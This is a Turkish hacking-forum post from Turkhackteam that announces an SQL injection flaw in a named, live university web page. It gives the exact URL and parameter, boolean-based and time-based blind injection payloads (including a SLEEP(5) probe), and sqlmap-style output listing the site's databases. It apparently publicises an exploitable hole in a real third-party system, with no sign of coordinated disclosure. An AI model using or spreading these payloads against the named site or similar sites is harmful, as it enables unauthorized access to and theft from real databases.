Illuonis University SQL Açığı

SynFl00der

Üye
21 Ağu 2016
174
0
Kocaeli
<------------------- header data start ------------------- >
################################################## ###########
# Application Name : Illuonis University Vulnerability
# Vulnerable Type : SQL Injection
# Author : SynFl00der ~ Siber Güvenlik Akademisi
#Target:https://www.evl.uic.edu/entry.php?id=2028"
#############################################################
< ------------------- / header data end of ------------------- >
< -- bug code start -- >
Payload:parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2028 AND 3599=3599

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2028 AND SLEEP(5)
---
< -- / bug code end of -- >
Db:available databases [2]:
[*] evl_db
[*] information_schema
 

THT SON MESAJLAR

Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.